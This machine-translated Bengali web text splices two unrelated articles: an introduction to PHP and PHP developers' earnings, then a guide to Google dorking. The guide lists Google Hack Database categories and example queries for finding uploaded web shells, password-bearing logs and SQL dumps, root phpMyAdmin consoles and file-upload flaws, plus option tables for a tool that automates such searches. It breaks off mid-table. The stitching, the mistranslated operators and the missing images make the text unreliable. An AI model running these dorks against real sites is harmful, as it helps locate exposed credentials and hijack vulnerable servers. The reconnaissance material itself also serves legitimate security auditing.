আসুন একটি উদাহরণ দেখি যেখানে পিএইচপি স্ক্রিপ্ট পৃষ্ঠায় চলে। উদাহরণস্বরূপ, সাবস্ক্রিপশন ফর্মটি নিন যেখানে আপনি অনেক সাইটে আপনার নাম এবং ইমেল লিখছেন৷ এইচটিএমএল এবং সিএসএস ফর্মটির উপস্থিতির জন্য দায়ী - ইনপুট ক্ষেত্র এবং বোতামগুলির রঙ, বোতামটি ঘোরানো এবং ক্লিক করার সময় তার রঙ পরিবর্তন করা এবং আরও অনেক কিছু। HTML5 ব্যবহার করে, আপনি ফর্মে প্রবেশ করা ডেটার সঠিকতা পরীক্ষা করতে পারেন - উদাহরণস্বরূপ, ইমেল বা ফোন ক্ষেত্রগুলি সঠিকভাবে পূরণ করা হয়েছে কিনা৷
এবং আপনি "সাবস্ক্রাইব" বোতামটি ক্লিক করার পরে, একটি পিএইচপি স্ক্রিপ্ট বলা হয়, যা ফর্মটিতে আপনার প্রবেশ করা ডেটা গ্রহণ করে। স্ক্রিপ্ট সেগুলিকে ডাটাবেসে রেকর্ড করে, ফর্মে উল্লিখিত ইমেলে আপনার সাবস্ক্রিপশন নিশ্চিত করতে আপনাকে একটি লিঙ্ক তৈরি করে এবং পাঠায়, সাবস্ক্রিপশন নিশ্চিতকরণ পরীক্ষা করে এবং আপনাকে পরবর্তী ইমেল পাঠায়। এই সমস্ত অপারেশন সার্ভারে সঞ্চালিত হয়, এবং এটি পিএইচপি প্রোগ্রামিং ভাষা ব্যবহার করে করা হয়।
ওয়েবসাইট ডেভেলপমেন্টে পিএইচপি এর প্রয়োগ
একটি ওয়েবসাইট তৈরি করতে, আপনাকে কয়েকটি ধাপ অতিক্রম করতে হবে:
পরিকল্পনা. এই পর্যায়ে, আমরা ভবিষ্যতের সাইটটির পরিকল্পনা করছি: কার জন্য এবং কেন আমরা এটি তৈরি করছি, কে সাইটটি পরিদর্শন করবে, এটি কী দিয়ে পূরণ করতে হবে, সাইটে কী থাকা উচিত ইত্যাদি।
ডিজাইন। ডিজাইনের পর্যায়ে, আমরা একটি গ্রাফিক এডিটরে সাইটের পৃষ্ঠাগুলির চেহারা তৈরি করি।
লেআউট। লেআউট পর্যায়ে, HTML এবং CSS ব্যবহার করে, আমরা ডিজাইন পর্যায়ে প্রাপ্ত লেআউটগুলি থেকে ভবিষ্যতের সাইটের HTML পৃষ্ঠাগুলি তৈরি করি।
প্রোগ্রামিং। প্রোগ্রামিং পর্যায়ে, আমরা সাইটের সাথে কাজ করার প্রক্রিয়াগুলিকে স্বয়ংক্রিয় করি। আমরা সাইটের প্রশাসনিক অংশ (অ্যাডমিন প্যানেল) প্রোগ্রাম করি যাতে আপনি ওয়েবসাইট তৈরির সাথে সম্পূর্ণ অপরিচিত ব্যক্তির জন্যও বিদ্যমান পৃষ্ঠাগুলি যোগ করতে, মুছতে, সম্পাদনা করতে পারেন। আমরা প্রোগ্রাম করি যাতে সাইটটিতে অনুসন্ধান এবং সমস্ত সাবস্ক্রিপশন ফর্ম (যদি থাকে) কাজ করে। আমরা নিশ্চিত করি যে নতুন যোগ করা পৃষ্ঠাটি সাইটে প্রদর্শিত হবে এবং মেনুতে স্বয়ংক্রিয়ভাবে তৈরি পৃষ্ঠার একটি লিঙ্ক প্রদর্শিত হবে। যদি সাইটটি ভোটিং বা একটি সমীক্ষা ব্যবহার করে, তবে এটিও প্রোগ্রামিং পর্যায়ে PHP-তে প্রোগ্রাম করা হয়।
যদি আমরা প্রোগ্রামিংয়ের পর্যায়ে একটি বৃহত্তর সাইট বিবেচনা করি, উদাহরণস্বরূপ, একটি অনলাইন স্টোর, তবে এখানে সবকিছু আরও বিস্তৃত এবং আরও আকর্ষণীয়। এই ক্ষেত্রে, আমরা শুধুমাত্র পৃষ্ঠাগুলিই নয়, পণ্যগুলিও যোগ করি - অনলাইন স্টোরের প্রধান সামগ্রী। অধিকন্তু, অ্যাডমিন প্যানেলে আপনাকে বিভিন্ন বিভাগে যুক্ত পণ্যগুলির একটি ভাঙ্গন সরবরাহ করতে হবে। পণ্য সম্পাদনা করা, এর বর্ণনা, মূল্য, ছবি ইত্যাদি পরিবর্তন করাও সম্ভব হওয়া উচিত।
উপরন্তু, একটি অনলাইন স্টোরের জন্য একটি অ্যানালিটিক্স সিস্টেমের প্রোগ্রামিং প্রয়োজন - যাতে আপনি অ্যাডমিন প্যানেলে দেখতে পারেন কতগুলি অর্ডার দেওয়া হয়েছে এবং অর্থ প্রদান করা হয়েছে, কী পরিমাণে এবং কোন পণ্যগুলির জন্য কোন বিভাগ থেকে অর্থ প্রদান করা হয়েছে ইত্যাদি। বিভিন্ন সময়ের জন্য এই ধরনের রিপোর্ট প্রদর্শন করা সম্ভব। একটি অনলাইন স্টোর প্রোগ্রামিং করার সময়, অ্যাকাউন্টিং এবং ট্যাক্স উদ্দেশ্যে বিক্রয় রিপোর্টিং প্রায়ই প্রয়োগ করা হয়।
এজন্য যে পর্যায়ে PHP প্রোগ্রামিং ভাষা ব্যবহার করা হয় সেটি সবচেয়ে গুরুত্বপূর্ণ, সময়ের দিক থেকে দীর্ঘতম এবং ওয়েবসাইট ডেভেলপমেন্টে সবচেয়ে ব্যয়বহুল এবং উচ্চ অর্থ প্রদান করা হয়। এবং একবার আপনি কীভাবে একটি অনলাইন স্টোর প্রোগ্রাম করবেন তা বুঝতে পারলে, আপনি প্রায় কোনও জটিলতার ওয়েবসাইটের জন্য স্ক্রিপ্ট তৈরি করতে সক্ষম হবেন।
পিএইচপি এর জনপ্রিয়তা
পিএইচপি-র জনপ্রিয়তা প্রমাণ করে যে এটি সমস্ত সাইটের 83.1% দ্বারা ব্যবহৃত হয় যেখানে সার্ভার-সাইড প্রোগ্রামিং ভাষা সনাক্ত করা সম্ভব ছিল।
জনপ্রিয়তা রেটিংয়ে প্রথম স্থান দখল করে এমন সব জনপ্রিয় CMS (পেইড এবং ফ্রি উভয়ই: WordPress, Joomla, Drupal, Modx, Bitrix. Magento, ইত্যাদি) পিএইচপি প্রোগ্রামিং ভাষায় লেখা।
এছাড়াও, পিএইচপি প্রোগ্রামিং ভাষার জনপ্রিয়তা অনেকগুলি তৈরি করা পিএইচপি ফ্রেমওয়ার্ক দ্বারা প্রমাণিত হয়, যেমন লারাভেল, ইআই, কেকপিএইচপি, স্লিম, জেন্ড ফ্রেমওয়ার্ক 2, পিএইচপিক্সি, কোডআইগনিটার, সিমফনি 2 এবং অন্যান্য। এখানে প্রচুর সংখ্যক ফোরাম এবং বৃহৎ সম্প্রদায় রয়েছে - সাধারণভাবে PHP-এর জন্য, প্রতিটি কাঠামোর জন্য এবং প্রতিটি CMS-এর জন্য আলাদাভাবে।
আমি আরও যোগ করব যে বিশ্বের বৃহত্তম সাইটগুলি, উদাহরণস্বরূপ, ফেসবুক, উইকিপিডিয়া, এছাড়াও পিএইচপি-তে লেখা।
কিভাবে আপনি PHP জ্ঞান দিয়ে অর্থ উপার্জন করতে পারেন?
পিএইচপি-র জনপ্রিয়তার পরিপ্রেক্ষিতে, পিএইচপি প্রোগ্রামারদের জন্য ক্রমাগত উচ্চ চাহিদা রয়েছে। পিএইচপি সম্পর্কে জ্ঞান থাকা এবং এই ভাষায় প্রোগ্রাম করতে সক্ষম হওয়া অর্থ উপার্জনের নতুন সুযোগ উন্মুক্ত করবে। চলুন দেখে নেওয়া যাক মূল জিনিসগুলি যা দিয়ে আপনি আজ সত্যিই অর্থোপার্জন করতে পারেন:
স্ক্রিপ্ট উন্নয়ন করে অর্থ উপার্জন. সমস্ত সাইট ক্রমাগত বিকশিত হচ্ছে, এবং তাদের পর্যায়ক্রমে নতুন স্ক্রিপ্ট লেখার প্রয়োজন হয়, বা অতিরিক্ত কার্যকারিতা, মডিউল ইত্যাদির বিকাশের প্রয়োজন হয়। এই ধরনের উন্নয়নের জন্য, সাইটের মালিকরা পিএইচপি বিকাশকারীদের দিকে ফিরে যান। তাছাড়া, এই ক্ষেত্রে আপনি দুটি উপায়ে অর্থ উপার্জন করতে পারেন:
ফ্রিল্যান্স ডেভেলপার খুঁজতে অর্ডার ট্র্যাক করুন;
গণ স্ক্রিপ্টের জন্য ধারণা তৈরি করুন। একটি স্ক্রিপ্টের জন্য একটি ধারণা থাকা যা অবশ্যই অনলাইন স্টোরের মালিকদের মধ্যে চাহিদা থাকবে, আপনি স্বাধীনভাবে এই জাতীয় স্ক্রিপ্ট বিকাশ করতে পারেন এবং এটি অনলাইন স্টোর মালিকদের কাছে বিক্রি করতে পারেন;
"অর্ডার করার জন্য" রেডিমেড স্ক্রিপ্টের চূড়ান্তকরণ। এখানে সবকিছুই সহজ - আপনি একটি স্ক্রিপ্টের পরিবর্তন বা সংশোধন গ্রহণ করেন। তবে এই ক্ষেত্রে, একটি সূক্ষ্মতা রয়েছে - প্রাথমিকভাবে স্ক্রিপ্টটি খুব ভালভাবে তৈরি নাও হতে পারে এবং এটির পরিমার্জন শুরু থেকে একটি স্ক্রিপ্ট লেখার চেয়ে বেশি সময় নিতে পারে। অতএব, আপনি যদি অর্থ উপার্জনের এই পদ্ধতিটি ব্যবহার করেন তবে প্রাথমিকভাবে আপনি কী পরিবর্তন এবং সম্পূর্ণ করবেন তা খুব সাবধানতার সাথে দেখুন।
সিএমএসের জন্য প্লাগইনগুলির বিকাশ। এই পদ্ধতিতে, স্ক্রিপ্ট থেকে অর্থ উপার্জন করার সময় সবকিছু একই রকম। প্রায়শই, রেডিমেড CMS-এ তৈরি ওয়েবসাইটগুলির জন্য কিছু ধরনের প্লাগইন, অ্যাড-অন বা এক্সটেনশন লেখার প্রয়োজন হয়। এবং আপনি এখানে দুটি উপায়ে অর্থ উপার্জন করতে পারেন:
ফ্রিল্যান্স ভিত্তিতে প্লাগইন, অ্যাড-অন এবং এক্সটেনশনগুলির বিকাশের জন্য অর্ডারগুলি ট্র্যাক করুন;
একটি ভর প্লাগইন বিকাশ এবং বিক্রি করুন যা অবশ্যই বেশিরভাগ সাইটে চাহিদা থাকবে;
নিজস্ব এবং যৌথ প্রকল্প। আপনার যদি একটি ইন্টারনেট প্রকল্প (স্টার্টআপ) সম্পর্কে ধারণা থাকে, উদাহরণস্বরূপ, একটি দরকারী পরিষেবা বা অ্যাপ্লিকেশনের জন্য একটি ধারণা যা একটি নির্দিষ্ট সমস্যার সমাধান করবে, তাহলে আপনি এটি বাস্তবায়ন শুরু করতে পারেন। প্রাথমিক পর্যায়ে, এটি আপনার প্রধান কাজ ছাড়াও একটি শখ হিসাবেও হতে পারে। তারপর, যখন এটি স্পষ্ট যে শখটি একটি বড় প্রকল্পে বাড়ছে, তখন এটিতে আরও সময় দেওয়া সম্ভব হবে।
তাদের জন্য গতিশীল ওয়েবসাইট এবং ইঞ্জিন তৈরি করা। এছাড়াও আপনি কাস্টম ওয়েবসাইট তৈরি করে, ফ্রিল্যান্সার হিসাবে বা ওয়েব স্টুডিওতে কাজ করে ভাল অর্থ উপার্জন করতে পারেন।
নিজের জন্য ওয়েবসাইট তৈরি করা। আপনি নিজের জন্য একটি ওয়েবসাইট তৈরি করতে পারেন, এটি দরকারী সামগ্রী দিয়ে পূরণ করতে পারেন - এবং যখন সাইটে পর্যাপ্ত সংখ্যক ভিজিটর থাকে, তখন এটিতে অর্থপ্রদানের বিজ্ঞাপন দিয়ে বা অ্যাফিলিয়েট প্রোগ্রামগুলির মাধ্যমে কারও পণ্যের প্রচার করে অর্থ উপার্জন শুরু করুন৷
আমি মনে করি আপনারা অনেকেই ভেবেছেন যে উপরের সমস্ত পদ্ধতি একত্রিত করে অর্থ উপার্জন করা যেতে পারে। এবং এটা ঠিক! আপনি নিজের জন্য একটি ওয়েবসাইট তৈরি করতে পারেন এবং এটি থেকে বিজ্ঞাপন বিক্রি করে নিষ্ক্রিয়ভাবে অর্থ উপার্জন করতে পারেন, এছাড়াও একটি স্ক্রিপ্ট বা প্লাগইন তৈরি করতে পারেন এবং এটি বিশেষ সাইটগুলিতে বিক্রি করতে পারেন, প্রতিটি বিক্রয় থেকে অটোপাইলটে অর্থ উপার্জন করতে পারেন এবং একই সাথে আপনি এখনও একটি ওয়েবে কাজ করতে পারেন স্টুডিও কেন না? অবশ্যই আপনি করতে পারেন!
একজন পিএইচপি ডেভেলপার কত আয় করতে পারেন?
পিএইচপি প্রোগ্রামারদের উপার্জনের সাথে, সবকিছুই স্বতন্ত্র। এখানে অনেক কিছু নির্ভর করে কোথায় কাজ করতে হবে, কীভাবে কাজ করতে হবে, কোন স্তরের জ্ঞান, কী অভিজ্ঞতা, যোগ্যতা, বিকাশকারীর কী সম্পর্কিত অতিরিক্ত জ্ঞান রয়েছে ইত্যাদি। অতএব, নীতিগতভাবে, এখানে কোন সঠিক পরিসংখ্যান থাকতে পারে না। কিন্তু একটি ওয়েব স্টুডিওতে PHP প্রোগ্রামারদের জন্য অনুসন্ধান করার সময় কী বেতন দেওয়া হয় এবং তারা ফ্রিল্যান্স এক্সচেঞ্জে একটি প্রকল্পের জন্য কত টাকা দিতে ইচ্ছুক তা আমরা দেখতে পারি।
নীচের ছবিটি একটি ওয়েব স্টুডিওতে PHP প্রোগ্রামারদের জন্য প্রস্তাবিত বেতন দেখায়। তাছাড়া, কাজের অভিজ্ঞতা ছাড়াই পিএইচপি প্রোগ্রামারদের জন্য এটি বেতন:
আপনার যদি কাজের অভিজ্ঞতা থাকে তবে আপনি অনেক বেশি আয় করতে পারেন। নীচে অভিজ্ঞ PHP প্রোগ্রামারদের বেতন দেওয়া হল।
এবং আজ আপনি ফ্রিল্যান্সিং থেকেও উপযুক্ত অর্থ উপার্জন করতে পারেন:
উপসংহার
পিএইচপি ওয়েব ডেভেলপারদের মধ্যে সবচেয়ে জনপ্রিয় প্রোগ্রামিং ভাষা। ইন্টারনেটের সমস্ত ওয়েবসাইটের বেশিরভাগই পিএইচপি-তে লেখা। এই প্রোগ্রামিং ল্যাঙ্গুয়েজে বিকাশ করার জ্ঞান এবং ক্ষমতা থাকলে, আপনি ভাল অর্থ উপার্জন করতে পারেন এবং অর্থ উপার্জনের জন্য অনেকগুলি বিকল্প রয়েছে - একটি ওয়েব স্টুডিওতে কাজ করা থেকে শুরু করে আপনার নিজস্ব প্রকল্প বা স্টার্টআপ বিকাশ করা পর্যন্ত।
ওয়েব রিসোর্সে দুর্বলতার জন্য যে কোনো অনুসন্ধান শুরু হয় পুনরুদ্ধার এবং তথ্য সংগ্রহের মাধ্যমে।
ইন্টেলিজেন্স হয় সক্রিয় হতে পারে - সাইটের ফাইল এবং ডিরেক্টরিগুলির নৃশংস শক্তি, দুর্বলতা স্ক্যানার চালানো, ম্যানুয়ালি সাইট ব্রাউজ করা, বা প্যাসিভ - বিভিন্ন সার্চ ইঞ্জিনে তথ্য অনুসন্ধান করা। কখনও কখনও এটি ঘটে যে সাইটের প্রথম পৃষ্ঠা খোলার আগেই একটি দুর্বলতা জানা হয়ে যায়।
এটা কিভাবে সম্ভব?
অনুসন্ধান রোবট, ক্রমাগত ইন্টারনেটে ঘোরাঘুরি করে, গড় ব্যবহারকারীর জন্য দরকারী তথ্য ছাড়াও, প্রায়শই এমন জিনিসগুলি রেকর্ড করে যা আক্রমণকারীরা একটি ওয়েব সংস্থান আক্রমণ করতে ব্যবহার করতে পারে। উদাহরণস্বরূপ, সংবেদনশীল তথ্য সহ স্ক্রিপ্ট ত্রুটি এবং ফাইল (কনফিগারেশন ফাইল এবং লগ থেকে প্রমাণীকরণ ডেটা এবং ডাটাবেস ব্যাকআপ সহ ফাইল)।
একটি অনুসন্ধান রোবটের দৃষ্টিকোণ থেকে, একটি sql ক্যোয়ারী চালানোর বিষয়ে একটি ত্রুটি বার্তা হল সরল পাঠ্য, অবিচ্ছেদ্য, উদাহরণস্বরূপ, পৃষ্ঠায় পণ্যগুলির বর্ণনা থেকে৷ যদি হঠাৎ করে একটি অনুসন্ধান রোবট .sql এক্সটেনশন সহ একটি ফাইল জুড়ে আসে, যেটি কোনও কারণে সাইটের কার্যকারী ফোল্ডারে শেষ হয়েছে, তবে এটি সাইটের বিষয়বস্তুর অংশ হিসাবে বিবেচিত হবে এবং এটিকে সূচীবদ্ধ করা হবে (সম্ভবত, পাসওয়ার্ড সহ এতে উল্লেখ করা হয়েছে)।
শক্তিশালী, প্রায়শই অনন্য, কীওয়ার্ডগুলি জেনে এই ধরনের তথ্য পাওয়া যেতে পারে যা দুর্বলতা ধারণ করে না এমন পৃষ্ঠাগুলি থেকে "অরক্ষিত পৃষ্ঠাগুলি" আলাদা করতে সহায়তা করে।
কীওয়ার্ড (তথাকথিত ডর্কস) ব্যবহার করে বিশেষ প্রশ্নের একটি বিশাল ডাটাবেস exploit-db.com-এ বিদ্যমান এবং এটি Google Hack Database নামে পরিচিত।
কেন গুগল?
Dorks প্রাথমিকভাবে দুটি কারণে Google এ লক্ষ্যবস্তু করা হয়:
− কীওয়ার্ডের সবচেয়ে নমনীয় সিনট্যাক্স (সারণী 1 এ দেখানো হয়েছে) এবং বিশেষ অক্ষর (সারণী 2 এ দেখানো হয়েছে);
- Google সূচক এখনও অন্যান্য সার্চ ইঞ্জিনের তুলনায় আরও সম্পূর্ণ;
সারণি 1 - প্রধান Google কীওয়ার্ড
কীওয়ার্ড |
অর্থ |
উদাহরণ |
সাইট |
শুধুমাত্র নির্দিষ্ট সাইটে অনুসন্ধান করুন. শুধুমাত্র অ্যাকাউন্ট url লাগে |
site:somesite.ru - একটি প্রদত্ত ডোমেন এবং সাবডোমেনে সমস্ত পৃষ্ঠাগুলি খুঁজে পাবে |
inurl |
ইউরিতে উপস্থিত শব্দ দ্বারা অনুসন্ধান করুন। cl অসদৃশ. শব্দ "সাইট", সাইটের নামের পরে মিলের জন্য অনুসন্ধান |
inurl:news - সমস্ত পৃষ্ঠাগুলি খুঁজে বের করে যেখানে প্রদত্ত শব্দটি ইউরিতে প্রদর্শিত হয় |
লিখিতরুপে |
পৃষ্ঠার মূল অংশে অনুসন্ধান করুন |
intext:"ট্র্যাফিক জ্যাম" - "ট্রাফিক জ্যাম" এর জন্য সাধারণ অনুরোধের সম্পূর্ণ অনুরূপ |
শিরোনাম |
পৃষ্ঠার শিরোনামে অনুসন্ধান করুন। ট্যাগের মধ্যে পাঠ্য |
intitle:"index of" - ডিরেক্টরি তালিকা সহ সমস্ত পৃষ্ঠা খুঁজে পাবে |
ext |
একটি নির্দিষ্ট এক্সটেনশন সহ পৃষ্ঠাগুলির জন্য অনুসন্ধান করুন৷ |
ext:pdf - সমস্ত পিডিএফ ফাইল খুঁজে পায় |
ফাইলের ধরন |
বর্তমানে, সম্পূর্ণরূপে ক্লাস অনুরূপ. শব্দ "ext" |
ফাইলের প্রকার: পিডিএফ - অনুরূপ |
সম্পর্কিত |
অনুরূপ বিষয় সহ সাইট অনুসন্ধান করুন |
সম্পর্কিত:google.ru - এর অ্যানালগগুলি দেখাবে |
লিঙ্ক |
এটির সাথে লিঙ্কযুক্ত সাইটগুলির জন্য অনুসন্ধান করুন৷ |
লিঙ্ক:somesite.ru - এটির একটি লিঙ্ক আছে এমন সমস্ত সাইট খুঁজে পাবে |
সংজ্ঞায়িত করা |
শব্দের সংজ্ঞা দেখান |
define:0day - শব্দটির সংজ্ঞা |
ক্যাশে |
ক্যাশে পৃষ্ঠা বিষয়বস্তু দেখান (যদি উপস্থিত থাকে) |
cache:google.com - একটি ক্যাশে পৃষ্ঠা খুলবে |
সারণি 2 - Google প্রশ্নের জন্য বিশেষ অক্ষর
প্রতীক |
অর্থ |
উদাহরণ |
“ |
সঠিক শব্দগুচ্ছ |
intitle: "RouterOS রাউটার কনফিগারেশন পৃষ্ঠা" - রাউটার অনুসন্ধান করুন |
* |
যেকোনো লেখা |
inurl: "bitrix*mcart" - একটি দুর্বল mcart মডিউল সহ বিট্রিক্সে সাইটগুলির জন্য অনুসন্ধান করুন |
. |
যে কোন চরিত্র |
Index.of - অনুরোধের সূচকের অনুরূপ |
- |
একটি শব্দ মুছে দিন |
ত্রুটি-সতর্কতা - এমন সমস্ত পৃষ্ঠা দেখান যেখানে ত্রুটি আছে কিন্তু কোনো সতর্কতা নেই |
.. |
পরিসর |
cve 2006..2016 - 2006 থেকে শুরু করে বছরের মধ্যে দুর্বলতা দেখান |
| |
যৌক্তিক "বা" |
লিনাক্স | windows - পৃষ্ঠাগুলি দেখান যেখানে প্রথম বা দ্বিতীয় শব্দটি ঘটে |
এটি বোঝার মতো যে কোনও অনুসন্ধান ইঞ্জিনের কাছে যে কোনও অনুরোধ কেবলমাত্র শব্দ দ্বারা অনুসন্ধান।
পৃষ্ঠায় মেটা-অক্ষরগুলি (উদ্ধৃতি, বন্ধনী, বিরাম চিহ্ন, ইত্যাদি) সন্ধান করা অকেজো। এমনকি উদ্ধৃতি চিহ্নগুলিতে নির্দিষ্ট শব্দগুচ্ছের জন্য একটি অনুসন্ধান একটি শব্দ অনুসন্ধান, ফলাফলে একটি সঠিক মিলের জন্য একটি অনুসন্ধান অনুসরণ করে।
সমস্ত Google Hack Database dorks যৌক্তিকভাবে 14টি বিভাগে বিভক্ত এবং সারণি 3 এ উপস্থাপিত হয়েছে।
সারণি 3 - গুগল হ্যাক ডাটাবেস বিভাগ
শ্রেণী |
কি আপনাকে খুঁজে পেতে অনুমতি দেয় |
উদাহরণ |
পাদদেশ |
ওয়েব শেল, পাবলিক ফাইল ম্যানেজার |
সমস্ত হ্যাক করা সাইটগুলি খুঁজুন যেখানে তালিকাভুক্ত ওয়েবশেলগুলি আপলোড করা হয়েছে: (intitle:"phpshell" OR intitle:"c99shell" OR intitle:"r57shell" OR intitle:"PHP Shell" OR intitle:"phpRemoteView") `rwx` "uname" |
ব্যবহারকারীর নাম ধারণকারী ফাইল |
রেজিস্ট্রি ফাইল, কনফিগারেশন ফাইল, লগ, প্রবেশ করা কমান্ডের ইতিহাস ধারণকারী ফাইল |
অ্যাকাউন্টের তথ্য সহ সমস্ত রেজিস্ট্রি ফাইল খুঁজুন: ফাইল টাইপ: reg reg + intext: "ইন্টারনেট অ্যাকাউন্ট ম্যানেজার" |
সংবেদনশীল ডিরেক্টরি |
বিভিন্ন তথ্য সহ ডিরেক্টরি (ব্যক্তিগত নথি, ভিপিএন কনফিগারেশন, লুকানো সংগ্রহস্থল ইত্যাদি) |
ভিপিএন-সম্পর্কিত ফাইল ধারণকারী সমস্ত ডিরেক্টরি তালিকা খুঁজুন: "কনফিগ" শিরোনাম: "ইনডেক্স অফ" ইনটেক্সট: ভিপিএন গিট সংগ্রহস্থল ধারণকারী সাইট: (intext:"index of /.git") ("প্যারেন্ট ডিরেক্টরি") |
ওয়েব সার্ভার সনাক্তকরণ |
ওয়েব সার্ভার সম্পর্কে সংস্করণ এবং অন্যান্য তথ্য |
JBoss সার্ভার প্রশাসনিক কনসোল খুঁজুন: inurl:"/web-console/" শিরোনাম: "প্রশাসন কনসোল" |
দুর্বল ফাইল |
পরিচিত দুর্বলতা ধারণকারী স্ক্রিপ্ট |
এমন সাইটগুলি খুঁজুন যা একটি স্ক্রিপ্ট ব্যবহার করে যা আপনাকে সার্ভার থেকে একটি নির্বিচারে ফাইল আপলোড করতে দেয়: allinurl:forcedownload.php?file= |
দুর্বল সার্ভার |
ইনস্টলেশন স্ক্রিপ্ট, ওয়েব শেল, ওপেন অ্যাডমিনিস্ট্রেটিভ কনসোল, ইত্যাদি। |
রুট হিসাবে চলমান খোলা PHPMyAdmin কনসোলগুলি খুঁজুন: intitle:phpMyAdmin "phpMyAdmin এ স্বাগতম ***" "* রুট@* হিসাবে চলছে" |
ভুল বার্তা |
বিভিন্ন ত্রুটি এবং সতর্কতা প্রায়ই গুরুত্বপূর্ণ তথ্য প্রকাশ করে - CMS সংস্করণ থেকে পাসওয়ার্ড পর্যন্ত |
যে সাইটগুলিতে ডাটাবেসে এসকিউএল কোয়েরি চালানোর ক্ষেত্রে ত্রুটি রয়েছে: "সতর্কতা: mysql_query()" "অবৈধ প্রশ্ন" |
সরস তথ্য ধারণকারী ফাইল |
শংসাপত্র, ব্যাকআপ, ইমেল, লগ, SQL স্ক্রিপ্ট, ইত্যাদি। |
প্রারম্ভিক sql স্ক্রিপ্ট খুঁজুন: filetype:sql এবং "insert into" -site:github.com |
পাসওয়ার্ড ধারণকারী ফাইল |
পাসওয়ার্ড ধারণ করতে পারে এমন কিছু - লগ, এসকিউএল স্ক্রিপ্ট ইত্যাদি। |
পাসওয়ার্ড উল্লেখ করা লগ: ফাইলের ধরন:লগলিখিতরুপে:পাসওয়ার্ড |পাস |pw পাসওয়ার্ড ধারণকারী sql স্ক্রিপ্ট: ext:এসকিউএললিখিতরুপে:ব্যবহারকারীর নামলিখিতরুপে:পাসওয়ার্ড |
সংবেদনশীল অনলাইন শপিং তথ্য |
অনলাইন ক্রয় সম্পর্কিত তথ্য |
পিনকোড খুঁজুন: dcid=bn=পিনকোড= |
নেটওয়ার্ক বা দুর্বলতা ডেটা |
তথ্য সরাসরি ওয়েব সম্পদের সাথে সম্পর্কিত নয়, কিন্তু নেটওয়ার্ক বা অন্যান্য নন-ওয়েব পরিষেবাগুলিকে প্রভাবিত করে |
অভ্যন্তরীণ নেটওয়ার্ক সম্পর্কে তথ্য ধারণকারী স্বয়ংক্রিয় প্রক্সি কনফিগারেশন স্ক্রিপ্ট খুঁজুন: inurl:প্রক্সি | inurl:wpad ext:pac | ext: dat findproxyforurl |
লগইন পোর্টাল ধারণকারী পৃষ্ঠা |
লগইন ফর্ম ধারণকারী পৃষ্ঠা |
saplogon ওয়েব পেজ: intext:"2016 SAP AG. সমস্ত অধিকার সংরক্ষিত." শিরোনাম: "লগন" |
বিভিন্ন অনলাইন ডিভাইস |
প্রিন্টার, রাউটার, মনিটরিং সিস্টেম ইত্যাদি |
প্রিন্টার কনফিগারেশন প্যানেল খুঁজুন: শিরোনাম:"এইচপিলেজারজেট"inurl:এসএসআই/প্রমাণ/সেট_config_ডিভাইস সম্পর্কিত তথ্য.htm |
উপদেশ এবং দুর্বলতা |
দুর্বল CMS সংস্করণে ওয়েবসাইট |
দুর্বল প্লাগইন খুঁজুন যার মাধ্যমে আপনি সার্ভারে একটি নির্বিচারে ফাইল আপলোড করতে পারেন: inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled |
Dorks প্রায়শই সমস্ত ইন্টারনেট সাইট জুড়ে অনুসন্ধানের উপর দৃষ্টি নিবদ্ধ করে। কিন্তু কিছুই আপনাকে কোনো সাইট বা সাইটে অনুসন্ধানের সুযোগ সীমিত করতে বাধা দেয় না।
প্রতিটি Google ক্যোয়ারী ক্যোয়ারীতে “site:somesite.com” কীওয়ার্ড যোগ করে একটি নির্দিষ্ট সাইটে ফোকাস করা যেতে পারে। এই কিওয়ার্ড যে কোন ডর্ক যোগ করা যেতে পারে.
দুর্বলতা জন্য অনুসন্ধান স্বয়ংক্রিয়
এভাবেই একটি সাধারণ ইউটিলিটি লেখার ধারণার জন্ম হয়েছিল যা একটি সার্চ ইঞ্জিন (গুগল) ব্যবহার করে দুর্বলতার জন্য অনুসন্ধানকে স্বয়ংক্রিয় করে এবং গুগল হ্যাক ডেটাবেসের উপর নির্ভর করে।
ইউটিলিটি হল ফ্যান্টমজ ব্যবহার করে নোডেজে লেখা একটি স্ক্রিপ্ট। সুনির্দিষ্টভাবে বলতে গেলে, স্ক্রিপ্টটি ফ্যান্টমজ দ্বারা ব্যাখ্যা করা হয়।
Phantomjs হল একটি GUI ছাড়াই একটি পূর্ণাঙ্গ ওয়েব ব্রাউজার, js কোড দ্বারা নিয়ন্ত্রিত এবং একটি সুবিধাজনক API সহ।
ইউটিলিটি একটি বেশ বোধগম্য নাম পেয়েছে - ডর্কস। কমান্ড লাইনে এটি চালানোর মাধ্যমে (বিকল্প ছাড়া), আমরা ব্যবহারের কয়েকটি উদাহরণ সহ সংক্ষিপ্ত সহায়তা পাই:
চিত্র 1 - প্রধান ডর্ক বিকল্পগুলির তালিকা
ইউটিলিটির সাধারণ সিনট্যাক্স হল: ডর্ক "কমান্ড" "বিকল্প তালিকা"।
সমস্ত বিকল্পের একটি বিশদ বিবরণ সারণি 4 এ উপস্থাপন করা হয়েছে।
সারণি 4 - ডর্কস সিনট্যাক্স
টীম |
অপশন |
বর্ণনা |
ghdb |
-l |
ডর্ক বিভাগের একটি সংখ্যাযুক্ত তালিকা প্রিন্ট করুন Google Hack Database |
-c "বিভাগ নম্বর বা নাম" |
নম্বর বা নাম অনুসারে নির্দিষ্ট বিভাগের দরজা লোড করুন |
|
-q "বাক্যাংশ" |
অনুরোধ দ্বারা পাওয়া dorks ডাউনলোড করুন |
|
-o "ফাইল" |
একটি ফাইলে ফলাফল সংরক্ষণ করুন (শুধুমাত্র -c|-q বিকল্পগুলির সাথে) |
|
গুগল |
-d "dork" |
একটি নির্বিচারে ডর্ক সেট করুন (বিকল্পটি অনেকবার ব্যবহার করা যেতে পারে, -D বিকল্পের সাথে সংমিশ্রণ অনুমোদিত) |
-ডি "ফাইল" |
ফাইল থেকে dorks ব্যবহার করুন |
|
-s "সাইট" |
সাইট সেট করুন (বিকল্প অনেকবার ব্যবহার করা যেতে পারে, বিকল্প -S এর সাথে সংমিশ্রণ অনুমোদিত) |
|
-এস "ফাইল" |
একটি ফাইল থেকে সাইট ব্যবহার করুন (ডর্ক্স স্বাধীনভাবে প্রতিটি সাইটের জন্য অনুসন্ধান করা হবে) |
|
-f "ফিল্টার" |
অতিরিক্ত কীওয়ার্ড সেট করুন (প্রতিটি ডর্কে যোগ করা হবে) |
|
-t "ms এর সংখ্যা" |
গুগলের অনুরোধের মধ্যে ব্যবধান |
|
-T "ms এর সংখ্যা" |
একটি ক্যাপচা সম্মুখীন হলে টাইমআউট |
|
-o "ফাইল" |
